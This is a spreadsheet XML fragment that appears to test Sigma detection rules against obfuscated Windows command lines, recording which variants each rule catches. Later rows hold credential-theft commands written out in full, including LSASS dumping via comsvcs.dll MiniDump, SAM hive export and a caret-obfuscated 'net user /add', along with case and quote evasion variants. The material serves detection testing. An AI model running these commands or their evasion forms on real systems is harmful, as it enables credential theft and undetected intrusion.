        <is>
          <t>powershell.exe -cOMmand "Get-ChildItem C:\Users\"</t>
        </is>
      </c>
      <c r="F595" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G595" s="36" t="b">
        <v>1</v>
      </c>
      <c r="H595" s="36" t="b">
        <v>1</v>
      </c>
      <c r="I595" s="43" t="n"/>
      <c r="J595" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K595" s="36" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="596" ht="15.75" customHeight="1" s="42">
      <c r="A596" s="43" t="n"/>
      <c r="B596" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_susp_local_system_owner_account_discovery</t>
        </is>
      </c>
      <c r="C596" s="36" t="inlineStr">
        <is>
          <t>Local Accounts Discovery</t>
        </is>
      </c>
      <c r="D596" s="36" t="inlineStr">
        <is>
          <t>502b42de-4306-40b4-9596-6f590c81f073</t>
        </is>
      </c>
      <c r="E596" s="36" t="inlineStr">
        <is>
          <t>powershell.exe -CoMMAnD "Get-ChildItem C:\Users\"</t>
        </is>
      </c>
      <c r="F596" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G596" s="36" t="b">
        <v>1</v>
      </c>
      <c r="H596" s="36" t="b">
        <v>1</v>
      </c>
      <c r="I596" s="43" t="n"/>
      <c r="J596" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K596" s="36" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="597" ht="15.75" customHeight="1" s="42">
      <c r="A597" s="43" t="n"/>
      <c r="B597" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_susp_local_system_owner_account_discovery</t>
        </is>
      </c>
      <c r="C597" s="36" t="inlineStr">
        <is>
          <t>Local Accounts Discovery</t>
        </is>
      </c>
      <c r="D597" s="36" t="inlineStr">
        <is>
          <t>502b42de-4306-40b4-9596-6f590c81f073</t>
        </is>
      </c>
      <c r="E597" s="36" t="inlineStr">
        <is>
          <t>powershell.exe -Command "Get-CimInstance -ClassName Win32_UserAccount"</t>
        </is>
      </c>
      <c r="F597" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G597" s="36" t="b">
        <v>1</v>
      </c>
      <c r="H597" s="36" t="b">
        <v>1</v>
      </c>
      <c r="I597" s="43" t="n"/>
      <c r="J597" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K597" s="36" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="598" ht="15.75" customHeight="1" s="42">
      <c r="A598" s="43" t="n"/>
      <c r="B598" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_susp_local_system_owner_account_discovery</t>
        </is>
      </c>
      <c r="C598" s="36" t="inlineStr">
        <is>
          <t>Local Accounts Discovery</t>
        </is>
      </c>
      <c r="D598" s="36" t="inlineStr">
        <is>
          <t>502b42de-4306-40b4-9596-6f590c81f073</t>
        </is>
      </c>
      <c r="E598" s="36" t="inlineStr">
        <is>
          <t>powershell.exe -CoMMAND "Get-CimInstance -ClassName Win32_UserAccount"</t>
        </is>
      </c>
      <c r="F598" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G598" s="36" t="b">
        <v>1</v>
      </c>
      <c r="H598" s="36" t="b">
        <v>1</v>
      </c>
      <c r="I598" s="43" t="n"/>
      <c r="J598" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K598" s="36" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="599" ht="15.75" customHeight="1" s="42">
      <c r="A599" s="43" t="n"/>
      <c r="B599" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_susp_local_system_owner_account_discovery</t>
        </is>
      </c>
      <c r="C599" s="36" t="inlineStr">
        <is>
          <t>Local Accounts Discovery</t>
        </is>
      </c>
      <c r="D599" s="36" t="inlineStr">
        <is>
          <t>502b42de-4306-40b4-9596-6f590c81f073</t>
        </is>
      </c>
      <c r="E599" s="36" t="inlineStr">
        <is>
          <t>powershell.exe -coMMAnD "Get-CimInstance -ClassName Win32_UserAccount"</t>
        </is>
      </c>
      <c r="F599" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G599" s="36" t="b">
        <v>1</v>
      </c>
      <c r="H599" s="36" t="b">
        <v>1</v>
      </c>
      <c r="I599" s="36" t="n"/>
      <c r="J599" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K599" s="36" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="600" ht="15.75" customHeight="1" s="42">
      <c r="A600" s="43" t="n"/>
      <c r="B600" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_susp_local_system_owner_account_discovery</t>
        </is>
      </c>
      <c r="C600" s="36" t="inlineStr">
        <is>
          <t>Local Accounts Discovery</t>
        </is>
      </c>
      <c r="D600" s="36" t="inlineStr">
        <is>
          <t>502b42de-4306-40b4-9596-6f590c81f073</t>
        </is>
      </c>
      <c r="E600" s="36" t="inlineStr">
        <is>
          <t>powershell.exe -commANd "Get-CimInstance -ClassName Win32_UserAccount"</t>
        </is>
      </c>
      <c r="F600" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G600" s="36" t="b">
        <v>1</v>
      </c>
      <c r="H600" s="36" t="b">
        <v>1</v>
      </c>
      <c r="I600" s="43" t="n"/>
      <c r="J600" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K600" s="36" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="601" ht="15.75" customHeight="1" s="42">
      <c r="A601" s="43" t="n"/>
      <c r="B601" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_susp_local_system_owner_account_discovery</t>
        </is>
      </c>
      <c r="C601" s="36" t="inlineStr">
        <is>
          <t>Local Accounts Discovery</t>
        </is>
      </c>
      <c r="D601" s="36" t="inlineStr">
        <is>
          <t>502b42de-4306-40b4-9596-6f590c81f073</t>
        </is>
      </c>
      <c r="E601" s="36" t="inlineStr">
        <is>
          <t>powershell.exe -c "Get-CimInstance -ClassName Win32_UserAccount"</t>
        </is>
      </c>
      <c r="F601" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G601" s="36" t="b">
        <v>1</v>
      </c>
      <c r="H601" s="36" t="b">
        <v>1</v>
      </c>
      <c r="I601" s="43" t="n"/>
      <c r="J601" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K601" s="36" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="602" ht="15.75" customHeight="1" s="42">
      <c r="A602" s="43" t="n"/>
      <c r="B602" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_susp_local_system_owner_account_discovery</t>
        </is>
      </c>
      <c r="C602" s="36" t="inlineStr">
        <is>
          <t>Local Accounts Discovery</t>
        </is>
      </c>
      <c r="D602" s="36" t="inlineStr">
        <is>
          <t>502b42de-4306-40b4-9596-6f590c81f073</t>
        </is>
      </c>
      <c r="E602" s="36" t="inlineStr">
        <is>
          <t>powershell.exe -Command "Get-LocalUser"</t>
        </is>
      </c>
      <c r="F602" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G602" s="36" t="b">
        <v>1</v>
      </c>
      <c r="H602" s="36" t="b">
        <v>1</v>
      </c>
      <c r="I602" s="43" t="n"/>
      <c r="J602" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K602" s="36" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="603" ht="15.75" customHeight="1" s="42">
      <c r="A603" s="43" t="n"/>
      <c r="B603" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_susp_local_system_owner_account_discovery</t>
        </is>
      </c>
      <c r="C603" s="36" t="inlineStr">
        <is>
          <t>Local Accounts Discovery</t>
        </is>
      </c>
      <c r="D603" s="36" t="inlineStr">
        <is>
          <t>502b42de-4306-40b4-9596-6f590c81f073</t>
        </is>
      </c>
      <c r="E603" s="36" t="inlineStr">
        <is>
          <t>powershell.exe -coMmaND "Get-LocalUser"</t>
        </is>
      </c>
      <c r="F603" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G603" s="36" t="b">
        <v>1</v>
      </c>
      <c r="H603" s="36" t="b">
        <v>1</v>
      </c>
      <c r="I603" s="43" t="n"/>
      <c r="J603" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K603" s="36" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="604" ht="15.75" customHeight="1" s="42">
      <c r="A604" s="43" t="n"/>
      <c r="B604" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_susp_local_system_owner_account_discovery</t>
        </is>
      </c>
      <c r="C604" s="36" t="inlineStr">
        <is>
          <t>Local Accounts Discovery</t>
        </is>
      </c>
      <c r="D604" s="36" t="inlineStr">
        <is>
          <t>502b42de-4306-40b4-9596-6f590c81f073</t>
        </is>
      </c>
      <c r="E604" s="36" t="inlineStr">
        <is>
          <t>powershell.exe -c "Get-LocalUser"</t>
        </is>
      </c>
      <c r="F604" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G604" s="36" t="b">
        <v>1</v>
      </c>
      <c r="H604" s="36" t="b">
        <v>1</v>
      </c>
      <c r="I604" s="43" t="n"/>
      <c r="J604" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K604" s="36" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="605" ht="15.75" customHeight="1" s="42">
      <c r="A605" s="43" t="n"/>
      <c r="B605" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_susp_local_system_owner_account_discovery</t>
        </is>
      </c>
      <c r="C605" s="36" t="inlineStr">
        <is>
          <t>Local Accounts Discovery</t>
        </is>
      </c>
      <c r="D605" s="36" t="inlineStr">
        <is>
          <t>502b42de-4306-40b4-9596-6f590c81f073</t>
        </is>
      </c>
      <c r="E605" s="36" t="inlineStr">
        <is>
          <t>powershell.exe -cOmmaNd "Get-LocalUser"</t>
        </is>
      </c>
      <c r="F605" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G605" s="36" t="b">
        <v>1</v>
      </c>
      <c r="H605" s="36" t="b">
        <v>1</v>
      </c>
      <c r="I605" s="43" t="n"/>
      <c r="J605" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K605" s="36" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="606" ht="15.75" customHeight="1" s="42">
      <c r="A606" s="43" t="n"/>
      <c r="B606" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_susp_local_system_owner_account_discovery</t>
        </is>
      </c>
      <c r="C606" s="36" t="inlineStr">
        <is>
          <t>Local Accounts Discovery</t>
        </is>
      </c>
      <c r="D606" s="36" t="inlineStr">
        <is>
          <t>502b42de-4306-40b4-9596-6f590c81f073</t>
        </is>
      </c>
      <c r="E606" s="36" t="inlineStr">
        <is>
          <t>powershell.exe -cOmmAnd "Get-LocalUser"</t>
        </is>
      </c>
      <c r="F606" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G606" s="36" t="b">
        <v>1</v>
      </c>
      <c r="H606" s="36" t="b">
        <v>1</v>
      </c>
      <c r="I606" s="43" t="n"/>
      <c r="J606" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K606" s="36" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="607" ht="15.75" customHeight="1" s="42">
      <c r="A607" s="43" t="n"/>
      <c r="B607" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_susp_whoami_as_param</t>
        </is>
      </c>
      <c r="C607" s="36" t="inlineStr">
        <is>
          <t>WhoAmI as Parameter</t>
        </is>
      </c>
      <c r="D607" s="36" t="inlineStr">
        <is>
          <t>e9142d84-fbe0-401d-ac50-3e519fb00c89</t>
        </is>
      </c>
      <c r="E607" s="36" t="inlineStr">
        <is>
          <t>cmd.exe /c whoami</t>
        </is>
      </c>
      <c r="F607" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G607" s="36" t="b">
        <v>1</v>
      </c>
      <c r="H607" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I607" s="36" t="inlineStr">
        <is>
          <t>Local Accounts Discovery (502b42de-4306-40b4-9596-6f590c81f073); Whoami Utility Execution (e28a5a99-da44-436d-b7a0-2afc20a5f413)</t>
        </is>
      </c>
      <c r="J607" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K607" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="608" ht="15.75" customHeight="1" s="42">
      <c r="A608" s="43" t="n"/>
      <c r="B608" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_susp_whoami_as_param</t>
        </is>
      </c>
      <c r="C608" s="36" t="inlineStr">
        <is>
          <t>WhoAmI as Parameter</t>
        </is>
      </c>
      <c r="D608" s="36" t="inlineStr">
        <is>
          <t>e9142d84-fbe0-401d-ac50-3e519fb00c89</t>
        </is>
      </c>
      <c r="E608" s="36" t="inlineStr">
        <is>
          <t>cmd.exe -"c" whoami</t>
        </is>
      </c>
      <c r="F608" s="36" t="b">
        <v>0</v>
      </c>
      <c r="G608" s="36" t="b">
        <v>1</v>
      </c>
      <c r="H608" s="36" t="b">
        <v>1</v>
      </c>
      <c r="I608" s="36" t="n"/>
      <c r="J608" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K608" s="36" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="609" ht="15.75" customHeight="1" s="42">
      <c r="A609" s="43" t="n"/>
      <c r="B609" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_susp_whoami_as_param</t>
        </is>
      </c>
      <c r="C609" s="36" t="inlineStr">
        <is>
          <t>WhoAmI as Parameter</t>
        </is>
      </c>
      <c r="D609" s="36" t="inlineStr">
        <is>
          <t>e9142d84-fbe0-401d-ac50-3e519fb00c89</t>
        </is>
      </c>
      <c r="E609" s="36" t="inlineStr">
        <is>
          <t>cmd.exe /C whoami</t>
        </is>
      </c>
      <c r="F609" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G609" s="36" t="b">
        <v>1</v>
      </c>
      <c r="H609" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I609" s="36" t="inlineStr">
        <is>
          <t>Local Accounts Discovery (502b42de-4306-40b4-9596-6f590c81f073); Whoami Utility Execution (e28a5a99-da44-436d-b7a0-2afc20a5f413)</t>
        </is>
      </c>
      <c r="J609" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K609" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="610" ht="15.75" customHeight="1" s="42">
      <c r="A610" s="43" t="n"/>
      <c r="B610" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_susp_whoami_as_param</t>
        </is>
      </c>
      <c r="C610" s="36" t="inlineStr">
        <is>
          <t>WhoAmI as Parameter</t>
        </is>
      </c>
      <c r="D610" s="36" t="inlineStr">
        <is>
          <t>e9142d84-fbe0-401d-ac50-3e519fb00c89</t>
        </is>
      </c>
      <c r="E610" s="36" t="inlineStr">
        <is>
          <t>cmd.exe /"c" whoami</t>
        </is>
      </c>
      <c r="F610" s="36" t="b">
        <v>0</v>
      </c>
      <c r="G610" s="36" t="b">
        <v>1</v>
      </c>
      <c r="H610" s="36" t="b">
        <v>1</v>
      </c>
      <c r="I610" s="36" t="n"/>
      <c r="J610" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K610" s="36" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="611" ht="15.75" customHeight="1" s="42">
      <c r="A611" s="43" t="n"/>
      <c r="B611" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_webshell_chopper</t>
        </is>
      </c>
      <c r="C611" s="36" t="inlineStr">
        <is>
          <t>Chopper Webshell Process Pattern</t>
        </is>
      </c>
      <c r="D611" s="36" t="inlineStr">
        <is>
          <t>fa3c117a-bc0d-416e-a31b-0c0e80653efb</t>
        </is>
      </c>
      <c r="E611" s="36" t="inlineStr">
        <is>
          <t>cmd.exe /c w^hoami&amp;echo [S]</t>
        </is>
      </c>
      <c r="F611" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G611" s="36" t="b">
        <v>1</v>
      </c>
      <c r="H611" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I611" s="43" t="inlineStr">
        <is>
          <t>Local Accounts Discovery (502b42de-4306-40b4-9596-6f590c81f073); Whoami Utility Execution (e28a5a99-da44-436d-b7a0-2afc20a5f413)</t>
        </is>
      </c>
      <c r="J611" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K611" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="612" ht="15.75" customHeight="1" s="42">
      <c r="A612" s="43" t="n"/>
      <c r="B612" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_webshell_chopper</t>
        </is>
      </c>
      <c r="C612" s="36" t="inlineStr">
        <is>
          <t>Chopper Webshell Process Pattern</t>
        </is>
      </c>
      <c r="D612" s="36" t="inlineStr">
        <is>
          <t>fa3c117a-bc0d-416e-a31b-0c0e80653efb</t>
        </is>
      </c>
      <c r="E612" s="36" t="inlineStr">
        <is>
          <t>cmd.exe /"c" w^hoami&amp;echo [S]</t>
        </is>
      </c>
      <c r="F612" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G612" s="36" t="b">
        <v>1</v>
      </c>
      <c r="H612" s="36" t="b">
        <v>1</v>
      </c>
      <c r="I612" s="43" t="n"/>
      <c r="J612" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K612" s="36" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="613" ht="15.75" customHeight="1" s="42">
      <c r="A613" s="43" t="n"/>
      <c r="B613" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_webshell_chopper</t>
        </is>
      </c>
      <c r="C613" s="36" t="inlineStr">
        <is>
          <t>Chopper Webshell Process Pattern</t>
        </is>
      </c>
      <c r="D613" s="36" t="inlineStr">
        <is>
          <t>fa3c117a-bc0d-416e-a31b-0c0e80653efb</t>
        </is>
      </c>
      <c r="E613" s="36" t="inlineStr">
        <is>
          <t>cmd.exe -"c" w^hoami&amp;echo [S]</t>
        </is>
      </c>
      <c r="F613" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G613" s="36" t="b">
        <v>1</v>
      </c>
      <c r="H613" s="36" t="b">
        <v>1</v>
      </c>
      <c r="I613" s="43" t="n"/>
      <c r="J613" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K613" s="36" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="614" ht="15.75" customHeight="1" s="42">
      <c r="A614" s="43" t="n"/>
      <c r="B614" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_webshell_chopper</t>
        </is>
      </c>
      <c r="C614" s="36" t="inlineStr">
        <is>
          <t>Chopper Webshell Process Pattern</t>
        </is>
      </c>
      <c r="D614" s="36" t="inlineStr">
        <is>
          <t>fa3c117a-bc0d-416e-a31b-0c0e80653efb</t>
        </is>
      </c>
      <c r="E614" s="36" t="inlineStr">
        <is>
          <t>cmd.exe /C w^hoami&amp;echo [S]</t>
        </is>
      </c>
      <c r="F614" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G614" s="36" t="b">
        <v>1</v>
      </c>
      <c r="H614" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I614" s="36" t="inlineStr">
        <is>
          <t>Local Accounts Discovery (502b42de-4306-40b4-9596-6f590c81f073); Whoami Utility Execution (e28a5a99-da44-436d-b7a0-2afc20a5f413)</t>
        </is>
      </c>
      <c r="J614" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K614" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="615" ht="15.75" customHeight="1" s="42">
      <c r="A615" s="43" t="n"/>
      <c r="B615" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_webshell_chopper</t>
        </is>
      </c>
      <c r="C615" s="36" t="inlineStr">
        <is>
          <t>Chopper Webshell Process Pattern</t>
        </is>
      </c>
      <c r="D615" s="36" t="inlineStr">
        <is>
          <t>fa3c117a-bc0d-416e-a31b-0c0e80653efb</t>
        </is>
      </c>
      <c r="E615" s="36" t="inlineStr">
        <is>
          <t>cmd.exe /"c" "&amp;wh^oami&amp;ec^ho"</t>
        </is>
      </c>
      <c r="F615" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G615" s="36" t="b">
        <v>1</v>
      </c>
      <c r="H615" s="36" t="b">
        <v>1</v>
      </c>
      <c r="I615" s="43" t="n"/>
      <c r="J615" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K615" s="36" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="616" ht="15.75" customHeight="1" s="42">
      <c r="A616" s="43" t="n"/>
      <c r="B616" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_webshell_hacking</t>
        </is>
      </c>
      <c r="C616" s="36" t="inlineStr">
        <is>
          <t>Webshell Hacking Activity Patterns</t>
        </is>
      </c>
      <c r="D616" s="36" t="inlineStr">
        <is>
          <t>4ebc877f-4612-45cb-b3a5-8e3834db36c9</t>
        </is>
      </c>
      <c r="E616" s="36" t="inlineStr">
        <is>
          <t>cmd.exe /c r^undll32.exe C:\Windows\System32\com^svcs.dll, MiniDump 600 C:\lsass.dmp full</t>
        </is>
      </c>
      <c r="F616" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G616" s="36" t="b">
        <v>1</v>
      </c>
      <c r="H616" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I616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616" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K616" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="617" ht="15.75" customHeight="1" s="42">
      <c r="A617" s="43" t="n"/>
      <c r="B617" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_webshell_hacking</t>
        </is>
      </c>
      <c r="C617" s="36" t="inlineStr">
        <is>
          <t>Webshell Hacking Activity Patterns</t>
        </is>
      </c>
      <c r="D617" s="36" t="inlineStr">
        <is>
          <t>4ebc877f-4612-45cb-b3a5-8e3834db36c9</t>
        </is>
      </c>
      <c r="E617" s="36" t="inlineStr">
        <is>
          <t>cmd.exe /C r^undll32.exe C:\Windows\System32\com^svcs.dll, MiniDump 600 C:\lsass.dmp full</t>
        </is>
      </c>
      <c r="F617" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G617" s="36" t="b">
        <v>1</v>
      </c>
      <c r="H617" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I617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617" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K617" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="618" ht="15.75" customHeight="1" s="42">
      <c r="A618" s="43" t="n"/>
      <c r="B618" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_webshell_hacking</t>
        </is>
      </c>
      <c r="C618" s="36" t="inlineStr">
        <is>
          <t>Webshell Hacking Activity Patterns</t>
        </is>
      </c>
      <c r="D618" s="36" t="inlineStr">
        <is>
          <t>4ebc877f-4612-45cb-b3a5-8e3834db36c9</t>
        </is>
      </c>
      <c r="E618" s="36" t="inlineStr">
        <is>
          <t>cmd.exe /"c" r^undll32.exe C:\Windows\System32\com^svcs.dll, MiniDump 600 C:\lsass.dmp full</t>
        </is>
      </c>
      <c r="F618" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G618" s="36" t="b">
        <v>1</v>
      </c>
      <c r="H618" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I618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618" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K618" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="619" ht="15.75" customHeight="1" s="42">
      <c r="A619" s="43" t="n"/>
      <c r="B619" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_webshell_hacking</t>
        </is>
      </c>
      <c r="C619" s="36" t="inlineStr">
        <is>
          <t>Webshell Hacking Activity Patterns</t>
        </is>
      </c>
      <c r="D619" s="36" t="inlineStr">
        <is>
          <t>4ebc877f-4612-45cb-b3a5-8e3834db36c9</t>
        </is>
      </c>
      <c r="E619" s="36" t="inlineStr">
        <is>
          <t>cmd.exe -"c" r^undll32.exe C:\Windows\System32\com^svcs.dll, MiniDump 600 C:\lsass.dmp full</t>
        </is>
      </c>
      <c r="F619" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G619" s="36" t="b">
        <v>1</v>
      </c>
      <c r="H619" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I619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619" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K619" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="620" ht="15.75" customHeight="1" s="42">
      <c r="A620" s="43" t="n"/>
      <c r="B620" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_webshell_hacking</t>
        </is>
      </c>
      <c r="C620" s="36" t="inlineStr">
        <is>
          <t>Webshell Hacking Activity Patterns</t>
        </is>
      </c>
      <c r="D620" s="36" t="inlineStr">
        <is>
          <t>4ebc877f-4612-45cb-b3a5-8e3834db36c9</t>
        </is>
      </c>
      <c r="E620" s="36" t="inlineStr">
        <is>
          <t>cmd.exe /c reg s^ave HKLM\SAM C:\temp\sam.save</t>
        </is>
      </c>
      <c r="F620" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G620" s="36" t="b">
        <v>1</v>
      </c>
      <c r="H620" s="36" t="b">
        <v>1</v>
      </c>
      <c r="I620" s="43" t="n"/>
      <c r="J620" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K620" s="36" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="621" ht="15.75" customHeight="1" s="42">
      <c r="A621" s="43" t="n"/>
      <c r="B621" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_webshell_hacking</t>
        </is>
      </c>
      <c r="C621" s="36" t="inlineStr">
        <is>
          <t>Webshell Hacking Activity Patterns</t>
        </is>
      </c>
      <c r="D621" s="36" t="inlineStr">
        <is>
          <t>4ebc877f-4612-45cb-b3a5-8e3834db36c9</t>
        </is>
      </c>
      <c r="E621" s="36" t="inlineStr">
        <is>
          <t>cmd.exe /"c" reg s^ave HKLM\SAM C:\temp\sam.save</t>
        </is>
      </c>
      <c r="F621" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G621" s="36" t="b">
        <v>1</v>
      </c>
      <c r="H621" s="36" t="b">
        <v>1</v>
      </c>
      <c r="I621" s="36" t="n"/>
      <c r="J621" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K621" s="36" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="622" ht="15.75" customHeight="1" s="42">
      <c r="A622" s="43" t="n"/>
      <c r="B622" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_webshell_hacking</t>
        </is>
      </c>
      <c r="C622" s="36" t="inlineStr">
        <is>
          <t>Webshell Hacking Activity Patterns</t>
        </is>
      </c>
      <c r="D622" s="36" t="inlineStr">
        <is>
          <t>4ebc877f-4612-45cb-b3a5-8e3834db36c9</t>
        </is>
      </c>
      <c r="E622" s="36" t="inlineStr">
        <is>
          <t>cmd.exe /C reg s^ave HKLM\SAM C:\temp\sam.save</t>
        </is>
      </c>
      <c r="F622" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G622" s="36" t="b">
        <v>1</v>
      </c>
      <c r="H622" s="36" t="b">
        <v>1</v>
      </c>
      <c r="I622" s="36" t="n"/>
      <c r="J622" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K622" s="36" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="623" ht="15.75" customHeight="1" s="42">
      <c r="A623" s="43" t="n"/>
      <c r="B623" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_webshell_hacking</t>
        </is>
      </c>
      <c r="C623" s="36" t="inlineStr">
        <is>
          <t>Webshell Hacking Activity Patterns</t>
        </is>
      </c>
      <c r="D623" s="36" t="inlineStr">
        <is>
          <t>4ebc877f-4612-45cb-b3a5-8e3834db36c9</t>
        </is>
      </c>
      <c r="E623" s="36" t="inlineStr">
        <is>
          <t>cmd.exe -"c" reg s^ave HKLM\SAM C:\temp\sam.save</t>
        </is>
      </c>
      <c r="F623" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G623" s="36" t="b">
        <v>1</v>
      </c>
      <c r="H623" s="36" t="b">
        <v>1</v>
      </c>
      <c r="I623" s="43" t="n"/>
      <c r="J623" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K623" s="36" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="624" ht="15.75" customHeight="1" s="42">
      <c r="A624" s="43" t="n"/>
      <c r="B624" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_webshell_hacking</t>
        </is>
      </c>
      <c r="C624" s="36" t="inlineStr">
        <is>
          <t>Webshell Hacking Activity Patterns</t>
        </is>
      </c>
      <c r="D624" s="36" t="inlineStr">
        <is>
          <t>4ebc877f-4612-45cb-b3a5-8e3834db36c9</t>
        </is>
      </c>
      <c r="E624" s="36" t="inlineStr">
        <is>
          <t>cmd.exe /"c" "n^e^t u^s^e^r t^e^s^t^u^s^e^r P^a^s^s^w^o^r^d /a^d^d"</t>
        </is>
      </c>
      <c r="F624" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G624" s="36" t="b">
        <v>1</v>
      </c>
      <c r="H624" s="36" t="b">
        <v>1</v>
      </c>
      <c r="I624" s="43" t="n"/>
      <c r="J624" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K624" s="36" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="625" ht="15.75" customHeight="1" s="42">
      <c r="A625" s="43" t="n"/>
      <c r="B625" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_webshell_hacking</t>
        </is>
      </c>
      <c r="C625" s="36" t="inlineStr">
        <is>
          <t>Webshell Hacking Activity Patterns</t>
        </is>
      </c>
      <c r="D625" s="36" t="inlineStr">
        <is>
          <t>4ebc877f-4612-45cb-b3a5-8e3834db36c9</t>
        </is>
      </c>
      <c r="E625" s="36" t="inlineStr">
        <is>
          <t>cmd.exe -"c" "n^e^t u^s^e^r t^e^s^t^u^s^e^r P^a^s^s^w^o^r^d /a^d^d"</t>
        </is>
      </c>
